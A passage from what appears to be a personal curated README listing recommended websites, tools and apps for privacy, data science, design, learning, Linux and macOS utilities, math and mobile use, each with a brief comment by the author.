[Tails](https://tails.boum.org/) ← privacy OS for pendrive (protects your privacy and offers all sorts of apps to do so, like Tor, Thunderbird and PGP) - [Temp Mail](https://temp-mail.org/en/) ← create a temporary anonymous e-mail - [Webbkoll](https://webbkoll.dataskydd.net/en/) ← monitor privacy-enhancing features on websites, and find out who is letting you exercise control over your privacy - [Whois](https://whois.domaintools.com/) ← whois lookup - [Your social media fingerprint](https://robinlinus.github.io/socialmedia-leak/) ← check where you are currently logged in **[⬆ Back to Contents](#contents)** ## 📊 Data Science [Subscribe to my newsletter](http://eepurl.com/dDqG-z) to find out even more inspiring stuff to help you with your analytics! ### cheatsheets My private Obsidian would be there, but I prefer to share only the most relevant content. **IMPORTANT**: be aware that [many cheatsheets repeat false information](https://www.linkedin.com/posts/adrianolszewski_biostatistics-statistics-rstats-activity-6621020198185111552-jw12), such as classifying logistic regression as a pure classification algorithm. - [Chris Albon](https://chrisalbon.com/) ← comprehensive notes/code snippets on using Data Science & Artificial Intelligence - [Comprehensive Python Cheatsheet](https://gto76.github.io/python-cheatsheet/) ← best Python cheatsheet I found so far - [Data Science board of my Pinterest](https://pinterest.com/pyxelrr/data-science/) - [Most general cheatsheet](https://github.com/FavioVazquez/ds-cheatsheets/blob/master/General/data-science-cheatsheet.pdf) ← in a single PDF file - [Statistical Models](https://www.linkedin.com/posts/adrianolszewski_rockyourr-rstats-datascience-activity-6612425857552252929-u-Ts/) ← most verified cheatsheet out there on the internet. I recommend following the author's LinkedIn account for lots of substantive discussions ### datasets - [50 Best Free Datasets for ML](https://www.telusinternational.com/insights/ai-data/article/the-50-best-free-datasets-for-machine-learning) - [100,000 Faces Generated by AI](https://generated.photos/) - [Academic Torrents](http://academictorrents.com/browse.php?cat=6&sort_field=times_completed&sort_dir=DESC) - [Apollo Scape](http://apolloscape.auto/scene.html) ← RGB videos with high resolution image sequences and per pixel annotation, survey-grade dense 3D points with semantic segmentation - [Awesome Public Datasets](https://github.com/caesar0301/awesome-public-datasets) - [AWS Public Datasets](https://aws.amazon.com/public-datasets/) - [Berkeley DeepDrive BDD100k](https://bdd-data.berkeley.edu/) ← 100,000 HD video sequences of over 1,100-hour driving experience across many different times in the day, weather conditions, and driving scenarios. Video sequences also include GPS locations, IMU data, and timestamps - [Caffe2](https://caffe2.ai/docs/datasets.html) - [Common Voice](https://voice.mozilla.org/en/datasets) ← dataset of voices that everyone can use to train speech-enabled applications - [CORGIS](https://think.cs.vt.edu/corgis/) ← datasets for beginners - [DataHub](https://datahub.io/search) ← easiest way to find, share and publish datasets online - [Datasets for machine learning](https://www.datasetlist.com/) ← huge list (CV/NLP/Audio) - [Datasets for mind reading](https://mindcodec.ai/2018/10/03/datasets-for-mind-reading/) (dataset is still available [here](https://crcns.org/data-sets/vc/vim-1/about-vim-1) with a CRCNS account) ← fancy, huh? - [FiveThirtyEight](https://data.fivethirtyeight.com/) ← economics, sports, politics - [Goodbooks-10k](https://github.com/zygmuntz/goodbooks-10k) ← new dataset for book recommendations - [Google BigQuery](https://www.reddit.com/r/bigquery/wiki/datasets) ← public datasets from Google - [Google Dataset Search](https://datasetsearch.research.google.com/) ← search engine of datasets from Google - [Grouplens datasets](https://grouplens.org/datasets/movielens/) - [HealthData](https://healthdata.gov/) ← high value health data - [How readers browse Wikipedia](https://blog.wikimedia.org/2018/01/16/wikipedia-rabbit-hole-clickstream/) - [Kaggle datasets](https://www.kaggle.com/datasets) - [List of lists with datasets](https://www.dataandsons.com/data-market/categories) - [LVIS](https://www.lvisdataset.org/) ← dataset for large vocabulary instance segmentation - [Mapillary Vistas Dataset](https://www.mapillary.com/dataset/vistas) ← street-level imagery dataset with pixel‑accurate and instance‑specific human annotations for understanding street scenes around the world - [Mathematics Dataset](https://github.com/deepmind/mathematics_dataset) ← generates mathematical question and answer pairs, from a range of question types at roughly school-level difficulty - [Million Song Dataset](http://millionsongdataset.com/) - [nuScenes](https://www.nuscenes.org/) ← large-scale autonomous driving dataset - [Papers With Code Datasets](https://paperswithcode.com/datasets) ← ML datasets with lots of filtering options - [Quandl](https://www.quandl.com/tools/python) ← financial data directly into Python - [Quantopian Datasets](https://www.quantopian.com/docs/data-reference/overview) - [Tencent ML-Images](https://github.com/Tencent/tencent-ml-images) ← largest multi-label image database; ResNet-101 model; 80.73% top-1 acc on ImageNet - [VQA](https://visualqa.org/) ← 200k+ images and over a million questions (with answers) about those images - [easy-VQA](https://github.com/vzhou842/easy-VQA) ← simpler version of the original VQA dataset - [World Bank Open Data](https://data.worldbank.org/) ← economic data - [YouTube 8M](https://research.google.com/youtube8m/) ← dataset of YouTube videos ### jobs - [CalmJobs](http://calmjobs.io/) ← job board of companies who value work-life balance - [DataJobs](https://datajobs.com/) ← jobs on the US market - [Indeed](https://www.indeed.com/) ← worldwide job search - [Kaggle jobs](https://www.kaggle.com/jobs) ← job board on Kaggle - [LinkedIn](https://www.linkedin.com/) ← social platform for employees - [Remote Jobs](https://remotehub.io/) ← browse 1,900+ remote companies and learn about their team, benefits, work culture and more - [StatsJobs](https://www.statsjobs.com/) ← jobs for statisticians - [Tech Interview Handbook](https://yangshun.github.io/tech-interview-handbook/) ← carefully curated content to help you ace your next technical interview with a focus on algorithms #### tools - [Glassdoor](https://www.glassdoor.com/index.htm) ← find jobs and company reviews from its employees - [Jobscan](https://www.jobscan.co/) ← optimise your resume using the ATS system - [levels.fyi](https://www.levels.fyi/?compare=Microsoft,Amazon,Apple&track=Software%20Engineer) ← compare salaries and career levels at big companies ### learning material - [AI Expert Roadmap](https://i.am.ai/roadmap) ← roadmap to becoming an Artificial Intelligence Expert in 2020 - [AI Explorables](https://pair.withgoogle.com/explorables/) ← big ideas in machine learning, simply explained by Google - [data-science-ipython-notebooks](https://github.com/donnemartin/data-science-ipython-notebooks) ← learn data science from IPython notebooks - [Deep Learning Monitor](https://deeplearn.org/) ← find new Arxiv papers, tweets and Reddit posts for you - [Dive into Deep Learning](https://d2l.ai/) ← interactive deep learning book with code, math, and discussions, based on the NumPy interface - [Explained Visually](http://setosa.io/ev/) ← interactive visualisations - [Kaggle](https://www.kaggle.com/) ← home of data science for competitions, datasets, coursers, notebooks and discussions - [Machine Learning for Everyone](https://vas3k.com/blog/machine_learning/) ← blog post, which explains the most critical concepts in a funny and practical way. You won't be bored reading it, and it might take you around 30-40 mins - [Machine Learning on Coursera](https://www.coursera.org/learn/machine-learning) ← the must check course by Andrew Ng - [Machine Learning Study Path March 2019](https://github.com/clone95/Machine-Learning-Study-Path-March-2019) ← GitHub repository with complete ML study path, focused on TensorFlow and Scikit-Learn - [Machine Learning with AWS](https://aws.amazon.com/training/learning-paths/machine-learning/) ← free digital curriculum used to train Amazon’s developers and data scientists. You can end it up with a paid professional certification straight from AWS - [Made with ML](https://madewithml.com/) ← platform for the ML community to learn, discover, share & organize content - [Neural Networks](https://www.youtube.com/playlist?list=PLZHQObOWTQDNU6R1_67000Dx_ZCJB-3pi) ← YouTube playlist of four (20 mins videos) explaining the theory behind neural networks (by 3blue1brown) - [Papers with Code](https://paperswithcode.com/) ← free and open resource with Machine Learning papers, code and evaluation tables ### news - [Data Science Central](https://www.datasciencecentral.com/) ← more of a social network for data passionates - [DataTau](http://www.datatau.net/) ← Hacker News like. Still growing, but I prefer it mostly for the concise design - [KDnuggets](https://www.kdnuggets.com/) ← hub for news, jobs and more, just like Data Science Central - [Towards Data Science](https://towardsdatascience.com/) ← Medium for DS - [Twitter](https://twitter.com/) ← you can start with [#datascience](https://twitter.com/hashtag/datascience?lang=en) or [Follow Friday](https://followfriday.io/) (AI) ### online tools - [A Neural Network Playground](https://playground.tensorflow.org/) ← train a neural network - [CNN Explainer](https://poloclub.github.io/cnn-explainer/) ← interactive visualization system designed to help non-experts learn about Convolutional Neural Networks (CNNs) - [ColorBrewer](http://colorbrewer2.org/) ← colour advice for maps - [Decision Trees in Javascript](https://cs.stanford.edu/~karpathy/svmjs/demo/demoforest.html) ← random forest demo in Javascript - check out also [SVMs demo](https://cs.stanford.edu/~karpathy/svmjs/demo/) - [GAN Lab](https://poloclub.github.io/ganlab/) ← play with Generative Adversarial Networks (GANs) in your browser! - [Grail Text Recognizer](https://jackschaedler.github.io/handwriting-recognition/) ← text recognition explained - [Image-to-Image Demo](https://affinelayer.com/pixsrv/) ← interactive image translation with pix2pix-tensorflow - [Interactive Machine Learning List](https://p.migdal.pl/interactive-machine-learning-list/) ← list of interactive ML visualisations - [Interactive Tools for ML, DL and Math](https://github.com/Machine-Learning-Tokyo/Interactive_Tools) ← learn and play with ML interactively (I highly recommend it!) - [Keras.js](https://transcranial.github.io/keras-js/) ← run Keras models in your browser - [Lyrebird AI](https://www.descript.com/lyrebird-ai) ← voice cloning - [PAIR tools](https://pair.withgoogle.com/tools/) ← open-source tools to help make ML models more understandable, reliable, and fair (by Google) - [Plotly Chart Studio](https://plot.ly/create/) ← online Plotly graph maker - [RAWGraphs](https://rawgraphs.io/) ← quickly generate data visualisations from spreadsheets - [RecurrentJS Sentence Memorization](https://cs.stanford.edu/people/karpathy/recurrentjs/) - [Seeing Theory](https://seeing-theory.brown.edu/) ← visual introduction to probability and statistics - [SegNet](https://mi.eng.cam.ac.uk/projects/segnet/) ← image segmentation - [Self-driving cars in the browser](https://janhuenermann.com/blog/learning-to-drive) - [StarByFace](https://starbyface.com/) ← celebrity look-alike application - [Talk to Transformer](https://talktotransformer.com/) ← write some text and generate the next sentences - [Teachable Machine](https://teachablemachine.withgoogle.com/) ← simple GUI for creating ML models ### questions - [Cross Validated](https://stats.stackexchange.com/) ← Stack Overflow for DS - [Data Science Stack Exchange](https://datascience.stackexchange.com/) ← alternative to Cross Validated - [Quora](https://www.quora.com/) ← general website for questions - subreddits ← find the right subreddits in the list below ### subreddits As there are many, I highly encourage you to check my custom feeds: - [~data_science](https://www.reddit.com/user/pyxelr/m/data_science/) - [~data_tools](https://www.reddit.com/user/pyxelr/m/data_tools/) - [~data_viz](https://www.reddit.com/user/pyxelr/m/data_viz/) - [~dev/mlops](https://www.reddit.com/user/pyxelr/m/devops/) - [~machine_learning](https://www.reddit.com/user/pyxelr/m/machine_learning/) - [~math](https://www.reddit.com/user/pyxelr/m/math/) ### visualisations - [Datavisualization](http://selection.datavisualization.ch/) ← list of visualisation tools - [FlowingData](https://flowingdata.com/) ← blog on data visualisation - [Information is Beautiful](https://informationisbeautiful.net/) ← see it with your own eyes - [Population.io](https://population.io/) ← what's your place in the world population? How long will you live? - [Simply Statistics](https://simplystatistics.org/) ← blog on data visualisation - [Worldometers](https://www.worldometers.info/) ← real-time world statistics **[⬆ Back to Contents](#contents)** ## 🎨 Design - [Can't Unsee](https://cantunsee.space/) ← check your graphical sense - [Everypixel](https://www.everypixel.com/) ← find free or paid stock images - [Grumpy Website](https://grumpy.website/) ← examples where the design went wrong - [GUI gallery for every OS](http://toastytech.com/guis/index.html) - [Squoosh](https://squoosh.app/) ← optimise image size - [UI Goodies](https://www.uigoodies.com/) ← directory of online resources ### colour palettes - [Adobe Color](https://color.adobe.com/create) ← colour wheel by Adobe - [Canva Color Wheel](https://www.canva.com/colors/color-wheel/) ← colour wheel by Canva - [Color Hunt](https://colorhunt.co/) ← colour palettes to choose from - [ColorKitty](https://colorkitty.com/) ← create and discover colour palettes - [Coolors](https://coolors.co/) ← quickly generate new colour schemes - [Happy Hues](https://www.happyhues.co/) ← colour palette inspiration site ### create - [Canva](https://www.canva.com/) ← create graphics easily - [Carbon](https://carbon.now.sh/) ← share an image of code - [Coggle](https://coggle.it/) ← generate mind maps - [diagrams.net](https://www.diagrams.net/) ← free online diagram software (previously: draw.io) - [Hatchful](https://hatchful.shopify.com/) ← logo creator from the Shopify team - [Kapwing](https://www.kapwing.com/tools) ← collaborative platform for creating images, videos, and GIFs - [Launchaco](https://www.launchaco.com/logo) ← free online logo maker - [Marvel](https://marvelapp.com/) ← create mockups in the browser - [Venngage](https://venngage.com/) ← infographic creator ### edit - [Photopea](https://www.photopea.com/) ← Photoshop in the browser - [Pixlr X](https://pixlr.com/x/) ← online image editor - [remove.bg](https://www.remove.bg/) ← automatically remove background from an image - [Unscreen](https://www.unscreen.com/) ← automatically remove background from a video ### icons - [CoreUI Icons](https://coreui.io/icons/) ← premium designed free icon set with marks in SVG, Webfont and raster formats - [Eva Icons](https://akveo.github.io/eva-icons/) ← simple open-source icons - [Flaticon](https://www.flaticon.com/) ← free vector icons - [Font Awesome](https://fontawesome.com/) ← vector icons and social logos for your website - [icons8](https://icons8.com/icons) ← free icons **[⬆ Back to Contents](#contents)** ## 📆 Events - [Eventbrite](https://www.eventbrite.com/) ← social network for events - [Eventil](https://eventil.com/) ← events for tech people - [Facebook Events](https://www.facebook.com/events/) - [Hackathon.com](https://www.hackathon.com/) ← find worldwide hackathons - [Meetup](https://www.meetup.com/) ← social network for events **[⬆ Back to Contents](#contents)** ## 📰 IT News All the mentioned sites are mostly free of clickbait and offer the triumph of form over content. - [Ars Technica](https://arstechnica.com/) - [dobreprogramy](https://www.dobreprogramy.pl/) (🇵🇱) ← one of the most popular Polish sites - [Hacker News](https://news.ycombinator.com/) ← my top resource with high quality content and discussions. Check out [my dark theme](https://github.com/pyxelr/hacker-news-bluish-gray) to save your eyes - [Slashdot](https://slashdot.org/) - [TechCrunch](https://techcrunch.com/) - [The Hacker News](https://thehackernews.com/) ← cybersecurity news **[⬆ Back to Contents](#contents)** ## 🧠 Learning - [Brilliant](https://brilliant.org/) ← replace lecture videos with hands-on, interactive problem solving - [Hypothesis](https://web.hypothes.is/) ← open-source tool to highlight/annotate the text you read online and in the scientific papers. It's a great way to organize your research, as well as hold discussions about your annotations with other users [like me](https://hypothes.is/users/pyxelr) - [Polar Bookshelf](https://github.com/burtonator/polar-bookshelf) ← open-source tool to annotate PDF documents and websites and later turn them into Anki flashcards. It's a quite unique alternative to Hypothesis - [Researcher](https://www.researcher-app.com/) ← feed for scientific papers - [Simple Wikipedia](https://simple.wikipedia.org/wiki/Main_Page) ← Wikipedia articles explained in simple words ### flashcards I've explained my way of using flashcards (mainly Anki) thoroughly in [this blog post](https://pawelcislo.com/2020/07/10/optimising-our-learning-retention-rate-with-srs-anki/). - [Anki](https://apps.ankiweb.net/) ← my favourite software to learn through spaced repetition and active learning in mobile and open-source PC app. Make sure to [check out my own decks](https://github.com/pyxelr/my-anki-decks-of-flashcards) - [flashcards.wizardzines](https://flashcards.wizardzines.com/) ← set of flashcards from Julia Evans - [Flashcards for Developers](https://www.flashcardsfordevelopers.com/) ← online flashcards based mostly on programming skills - [Fluent Forever](https://fluent-forever.com/) ← paid application to study languages. You can also read its [accompanying book](https://www.goodreads.com/book/show/22304017-fluent-forever) and watch the [author’s comparison between FF and Anki](https://youtu.be/fepSv0fqg5U) - [Memrise](https://www.memrise.com/) ← learn a language and not only - [NeuraCache](https://neuracache.com/) ← automatically generate flashcards from Twitter posts, Markdown editors, Kindle or your favourite note-taking tools, such as OneNote, Evernote or Roam and study them all using a mobile app - [Quizlet](https://quizlet.com/) ← more user-friendly alternative to Anki - [RemNote](https://www.remnote.io/homepage) ← note-taking app that will convert your notes to flashcards with the use of specific syntax. Here you can check its [live demo](https://www.remnote.io/documentation/cJSBN4bczFCPMwBx7) - [ShortcutFoo](https://www.shortcutfoo.com/) ← fun way to memorise shortcuts and commands - [SuperMemo](https://super-memo.com/supermemo18.html) ← more advanced tool over Anki, including the incremental reading feature. The author also dedicated a lot of time into the [science behind the learning topic](http://www.super-memory.com/) - [Tinycards](https://tinycards.duolingo.com/) ← flashcard app from the creators of Duolingo ### languages - [Busuu](https://www.busuu.com/) ← global language learning community, where you can take language courses to practice reading, writing, listening and speaking (great alternative to Duolingo) - [Clozemaster](https://www.clozemaster.com/) ← language learning gamification through mass exposure to vocabulary in context - [Duolingo](https://www.duolingo.com/) ← free web/mobile app to learn most of the languages - [LyricsTraining](https://lyricstraining.com/) ← learning languages with the music videos and filling in the lyrics of your favorite songs - [Reverso Context](https://context.reverso.net/translation/) ← translator with example sentences to give more context - [Rosetta Stone](https://www.rosettastone.com/) ← learn online with a possibility to book online conversations with a native speaker - [YouGlish](https://youglish.com/) ← search engine to find the pronunciation of the phrase in a YouTube video. The site offers multiple languages ### online courses - [A Cloud Guru](https://acloudguru.com/) ← courses and real hands-on labs in AWS, Azure, Google Cloud, and beyond - [Coursera](https://www.coursera.org/) ← courses by universities and other professional organizations - [Courseroot](https://courseroot.com/) ← course search engine - [DataCamp](https://www.datacamp.com/) ← online courses just for data science - [Dataquest](https://www.dataquest.io/) ← online courses just for data science (seems to be tougher than DataCamp but lacks the mobile app) - [edX](https://www.edx.org/) ← online university-level courses - [HN Academy](https://yahnd.com/academy/) ← online courses recommended by the community of Hacker News - [Khan Academy](https://www.khanacademy.org/) ← free online university - [O'Reilly learning](https://www.oreilly.com/online-learning/) ← learning platform with online interactive sandboxes and access to O'Reilly books - [SwitchUp](https://www.switchup.org/) ← compare/rank bootcamps by subjects - [Udacity](https://www.udacity.com/) ← high-quality courses for tech topics - [Udemy](https://www.udemy.com/) ← find and create online courses ### questions - [Quora](https://www.quora.com/) ← ask anything - [Reddit](https://www.reddit.com/) ← find the right subreddit for your question - [Stack Exchange](https://stackexchange.com/sites) ← find the right site to ask your question - [Stack Overflow](https://stackoverflow.com/) ← all the programming related questions ### simulations - [AI Explorables](https://pair.withgoogle.com/explorables/) ← big ideas in machine learning, simply explained by Google - [Explained Visually](http://setosa.io/ev/) ← interactive visualisations - [Explorable Explanations](https://explorabl.es/all/) ← hub for learning through interactive online games. Make sure to check out more from [Nicky Case!](https://ncase.me/) - [Explorable Physics](https://landgreen.github.io/physics/index.html) ← course notes for algebra based physics with explorable explanations - [Neal.fun](https://neal.fun/) ← lots of interactive educational/interesting comparisons - [Prajwal DSouza](https://prajwalsouza.github.io/) ← simulations related to Math, Physics and Computer Science **[⬆ Back to Contents](#contents)** ## 🐧 Linux - [Cassowary](https://github.com/casualsnek/cassowary) ← run Windows applications on Linux as if they are native - [DistroTest](https://distrotest.net/index.php) ← try running any Linux distro in the cloud VM - [instantbox](https://github.com/instantbox/instantbox) ← spin up temporary Linux systems with instant webshell access from any browser - [Peek](https://github.com/phw/peek) ← animated GIF recorder for Linux - [termtosvg](https://github.com/nbedos/termtosvg) ← record terminal sessions as SVG animations - [UserLAnd](https://github.com/CypherpunkArmory/UserLAnd) ← run a Linux distribution or application on Android (without root) - [WebVM](https://webvm.io/) ← server-less virtual Linux env running client-side in HTML5/WebAssembly - [Wine](https://www.winehq.org/) ← compatibility layer capable of running Windows applications on several POSIX-compliant operating systems, such as Linux, macOS, & BSD - [xxh](https://github.com/xxh/xxh) ← bring your favorite shell wherever you go through ssh ### shell Additionally, you can find settings of my terminals (UI, plugins, aliases, etc.) in the [my-terminal](https://github.com/pyxelr/my-terminal) repository. - [bat](https://github.com/sharkdp/bat) ← cat(1) clone with wings - [broot](https://github.com/Canop/broot) ← new way to see and navigate directory trees - [CommandLineFu](https://www.commandlinefu.com/commands/browse)← share & browse Linux CLI one-liners - [crontab guru](https://crontab.guru/) ← quick and simple editor for cron schedule expressions - [exa](https://github.com/ogham/exa) ← modern replacement for `ls` - [explainshell](https://explainshell.com/) ← match CLI arguments to their help text - [fd](https://github.com/sharkdp/fd) ← better alternative to `find` - [fzf](https://github.com/junegunn/fzf) ← CLI fuzzy finder - [howdoi](https://github.com/san-kumar/howdoi) ← get quick answers to common linux related questions, right inside your terminal by typing `"howdoi [your question]"` - [htop](https://github.com/htop-dev/htop/) ← interactive process viewer - [Modern Unix](https://github.com/ibraheemdev/modern-unix) ← collection of modern/faster/saner alternatives to common unix commands - [A list of new(ish) command line tools](https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/) ← by Julia Evans - [Neofetch](https://github.com/dylanaraps/neofetch) ← CLI tool to display information about your OS in an aesthetic way - [nushell](https://github.com/nushell/nushell) ← new type of shell - [Oh My Zsh](https://ohmyz.sh/) ← framework for managing your Zsh configuration - [Online Bash Shell](https://www.onlinegdb.com/online_bash_shell) ← online Bash editor - [Outrun](https://github.com/Overv/outrun) ← execute a local command using the processing power of another Linux machine - [ShellCheck](https://www.shellcheck.net/) ← find bugs in your shell scripts - [Starship](https://github.com/starship/starship) ← prompt for any shell ([customize it](https://starship.rs/config/#configuration), e.g. to disable the package module) - [tealdeer](https://github.com/dbrgn/tealdeer) ← very fast implementation of tldr in Rust - [tree](http://mama.indstate.edu/users/ice/tree/) ← display directories as trees (with optional color/HTML output) - [zsh](https://www.zsh.org/) ← shell designed for interactive use, although it is also a powerful scripting language - [zsh-autosuggestions](https://github.com/zsh-users/zsh-autosuggestions) ← fish-like autosuggestions for Zsh - [zsh-syntax-highlighting](https://github.com/zsh-users/zsh-syntax-highlighting) ← fish shell like syntax highlighting for Zsh #### devops/mlops - [aws-cli](https://github.com/aws/aws-cli) ← official Amazon AWS command-line interface - [helm](https://helm.sh/) ← package manager for Kubernetes - [jq](https://github.com/stedolan/jq) ← CLI JSON processor - [k9s](https://k9scli.io/) ← Kubernetes CLI (alternatively, try [Lens](https://k8slens.dev/)) - [kubectl](https://kubernetes.io/docs/tasks/tools/) ← Kubernetes cluster manager - [kustomize](https://kustomize.io/) ← Kubernetes native configuration management - [sops](https://github.com/mozilla/sops) ← tool for managing secrets - [yq](https://github.com/mikefarah/yq) ← command-line YAML, JSON and XML processor **[⬆ Back to Contents](#contents)** ## 🍎 macOS - [AirBuddy](https://v2.airbuddy.app/) ← control wireless devices - [Alfred](https://www.alfredapp.com/) ← extendable launcher - [Amphetamine](https://apps.apple.com/us/app/amphetamine/id937984704) ← keep your screen awake - [Automator](https://support.apple.com/en-gb/guide/automator/welcome/mac) ← built-in app to create workflows - [Bartender](https://www.macbartender.com/) ← take control of menu bar - [BetterSnapTool](https://folivora.ai/bettersnaptool) ← easily manage your window positions - [BetterTouchTool](https://folivora.ai/) ← customize various input devices - [BetterZip](https://macitbetter.com/) ← next generation of archiving - [CleanShot X](https://cleanshot.com/) ← screenshot tool - [Monosnap](https://monosnap.com/) ← free alternative - [DevToysMac](https://github.com/ObuchiYuki/DevToysMac) ← swiss army knife for developers - [Ferdium](https://ferdium.org/) ← all the social apps in one place - [HazeOver](https://hazeover.com/) ← fade out background windows - [Homebrew](https://brew.sh/) ← package manager for macOS - [iStatistica Pro](https://www.imagetasks.com/istatistica/pro/) (with iStatistica Sensors) ← system monitoring - [iTerm2](https://iterm2.com/) ← better terminal (you can find my settings [here](https://github.com/pyxelr/my-terminal)) - [Itsycal](https://www.mowglii.com/itsycal/) ← tiny menu bar calendar - [Karabiner-Elements](https://karabiner-elements.pqrs.org/) ← keyboard customizer - [Keyboard Maestro](https://www.keyboardmaestro.com/main/) ← macOS automation software - [Little Snitch](https://www.obdev.at/products/littlesnitch/index.html) ← host-based application firewall for macOS - [mas](https://github.com/mas-cli/mas) ← Mac App Store command line interface - [MeetingBar](https://github.com/leits/MeetingBar) ← menu bar calendar - Microsoft - [Microsoft Excel](https://apps.apple.com/us/app/microsoft-excel/id586683407) ← my favourite spreadsheet editor - [Microsoft Outlook](https://apps.apple.com/us/app/microsoft-outlook/id951937596) ← my favourite e-mail client - [Microsoft PowerPoint](https://apps.apple.com/us/app/microsoft-powerpoint/id586449534) ← my favourite slideshow creator - [Microsoft Word](https://apps.apple.com/us/app/microsoft-word/id586447913) ← my favourite document editor - [New File Menu](https://apps.apple.com/us/app/new-file-menu/id1064959555?mt=12) ← create new files via Finder - [Numi](https://numi.app/) ← beautiful calculator - [Objective-See’s Tools](https://objective-see.org/tools.html) ← free, open-source, tools to secure your Mac - [PDF Reader Pro](https://www.pdfreaderpro.com/mac) ← best PDF editor as per [this comparison](https://docs.google.com/spreadsheets/d/1pCt75tHayO_QJO2swREcZEgAFEhrm9-3pnDogh5kpRM/) - [QSpace Pro](https://qspace.awehunt.com/en-us/index.html) ← more advanced Finder - [Raycast](https://www.raycast.com/) ← alternative to Alfred - [Sound Control](https://staticz.com/soundcontrol/) ← advanced audio controls - [System Color Picker](https://apps.apple.com/pl/app/system-color-picker/id1545870783?mt=12) ← built-in color picker - [Tinker Tool](http://www.bresink.com/osx/TinkerTool.html) ← adjust hidden OS features, e.g. to disable animation on hiding/showing dock - [Transmit](https://panic.com/transmit/) ← upload, download, and manage files on tons of servers - [UnnaturalScrollWheels](https://github.com/ther0n/UnnaturalScrollWheels) ← invert scroll direction for mouse & trackpad - [Xcode Command Line Tools](https://mac.install.guide/commandlinetools/index.html) ← tools for software developers that run on the command line **[⬆ Back to Contents](#contents)** ## ➗ Math ### learn - [Become a Calculus Master](https://www.udemy.com/calculus1/) ← Udemy course of three parts - [Better Explained](https://betterexplained.com/calculus/) ← free calculus course - [Calculus for Beginners and Artists](http://www-math.mit.edu/~djk/calculus_beginners/index.html) ← free online book - [Calculus For The People -- Season 1](https://www.geogebra.org/m/x39ys4d7) ← free online book with interactive elements - [Example Problems](http://www.exampleproblems.com/wiki/index.php/Main_Page) ← example problems with solutions in a Wiki format - [immersive linear algebra](http://immersivemath.com/ila/index.html) ← free interactive online book - [Interactive Linear Algebra](https://textbooks.math.gatech.edu/ila/index.html) ← free online textbook at Georgia Tech - [Mathematics For Machine Learning](https://mml-book.github.io/) ← free book in a PDF format - [Mathigon](https://mathigon.org/) ← interactive math online - [Math is Fun](https://www.mathsisfun.com/) ← easy mathematical explanations - [OnlineStatBook](http://onlinestatbook.com/2/index.html) ← easy to understand book about math (in my opinion). It is best to go through the online version as it contains some exercises ### tools - [Desmos](https://www.desmos.com/calculator) ← graphing calculator. You can create visualisations close to 3blue1brown style (such as [[1]](https://www.desmos.com/calculator/p3cqhpvjld) or [[2]](https://www.desmos.com/calculator/pocv58hhrf)) - [Manim](https://github.com/3b1b/manim) ← generate explanatory animations for your math videos (created by [3blue1brown](https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw)) - [Mathway](https://www.mathway.com/Algebra) ← algebra problem solver - [Symbolab](https://www.symbolab.com/) ← step by step solver - [WolframAlpha](https://www.wolframalpha.com/) ← ultimate online calculator **[⬆ Back to Contents](#contents)** ## 📱 Mobile Apps - [AdGuard](https://adguard.com/en/products.html) ← get rid of intrusive ads and online tracking - [Algorithms: Explained and Animated](https://play.google.com/store/apps/details?id=wiki.algorithm.algorithms) ← great representation of various algorithms - [AnkiDroid Flashcards](https://play.google.com/store/apps/details?id=com.ichi2.anki) ← learn any topic using active learning and spaced repetition. Before using the mobile app, I strongly suggest to set up your account and decks of cards using the [PC app](https://apps.ankiweb.net/). Also, make sure to check the [public decks shared from my side](https://github.com/pyxelr/my-anki-decks-of-flashcards) - [AZ Screen Recorder](https://play.google.com/store/apps/details?id=com.hecorat.screenrecorder.free) ← best free screen recorder - [Backdrops](https://backdrops.io/) ← my favorite high-quality wallpaper app - [Boost for reddit](https://play.google.com/store/apps/details?id=com.rubenmayayo.reddit) ← Reddit client - [Brilliant](https://brilliant.org/) ← replace lecture videos with hands-on, interactive problem solving - [Calmaria](https://calmaria.app/) ← focus / breathe / relax - [Chess King (Learn Tactics & Solve Puzzles)](https://learn.chessking.com/) ← collection of chess education courses - [Cymath - Math Problem Solver](https://www.cymath.com/) ← step by step problem solver - [Elevate](https://www.elevateapp.com/) ← used daily can significantly improve math, reading, writing, speaking, and listening - [Enki](https://www.enki.com/) ← learn data science, coding, and stay on top of tech trends - [File Manager Plus](https://play.google.com/store/apps/details?id=com.alphainventor.filemanager) ← my favourite file manager - [Google Lens](https://lens.google/) ← search what you see - [Grasshopper](https://grasshopper.app/) ← learn JavaScript for free from Google - [Harmonic for Hacker News](https://play.google.com/store/apps/details?id=com.simon.harmonichackernews) ← great looking tech news that I can read for hours - [HiPER Calc Scientific Calculator](https://hiperdevelopment.wixsite.com/hipercalc-android) ← high precision scientific calculator - [InShot](https://inshot.com/) ← most advanced video editor - [lichess](https://play.google.com/store/apps/details?id=org.lichess.mobileapp) ← best open-source free chess - [Listen Audiobook Player](https://play.google.com/store/apps/details?id=com.acmeandroid.listen) ← my favourite Audiobook Player - [Mathlab Graphing Calculator](https://www.mathlab.us/calc/index.html) ← scientific, graphing, fraction and matrix calculator in one app - [Network Analyzer](https://techet.net/netanalyzer/) ← network analysis, scanning and problem detection - [One Calendar](https://www.onecalendar.nl/) ← manage all your calendars on all your devices - [Pocket Casts](https://www.pocketcasts.com/) ← my favourite Podcast Player - [Polish](https://play.google.com/store/apps/details?id=photo.editor.photoeditor.photoeditorpro) ← most advanced photo editor - [Puzzlerama](https://play.google.com/store/apps/details?id=com.leodesol.games.puzzlecollection) ← stock of puzzles - [Pydroid 3](https://play.google.com/store/apps/details?id=ru.iiec.pydroid3) ← Python 3 IDE for Android - [Screen On](https://play.google.com/store/apps/details?id=de.dieterthiess.keepiton) ← app and widget to keep the screen on - [Simon Tatham's Puzzles](https://play.google.com/store/apps/details?id=name.boyle.chris.sgtpuzzles) ← mobile implementation of the [web-based collection](https://www.chiark.greenend.org.uk/~sgtatham/puzzles/) of one-player puzzle games - [Statinfer](https://play.google.com/store/apps/details?id=com.learn.statinfer1) ([archived apk file](https://apkpure.com/statinfer-%E2%80%93-learn-data-science/com.learn.statinfer1)) ← quiz app to test your data science skills (ML, DL, tools, interview questions, etc.) - [SoloLearn](https://www.sololearn.com/) ← mobile programming university - [Termux](https://termux.com/) ← Android terminal emulator and Linux environment app (you can find my settings [here](https://github.com/pyxelr/my-terminal)) - [Tiny Scanner](https://play.google.com/store/apps/details?id=com.appxy.tinyscanner) ← PDF scanner app - [Twilight](https://twilight.urbandroid.org/) ← blue light filter - [Universe in a Nutshell](https://shop-eu.kurzgesagt.org/products/universe-in-a-nutshell-app) ← Wait but Why and Kurzgesagt version of the online [Scale of the Universe 2](https://htwins.net/scale2/) - 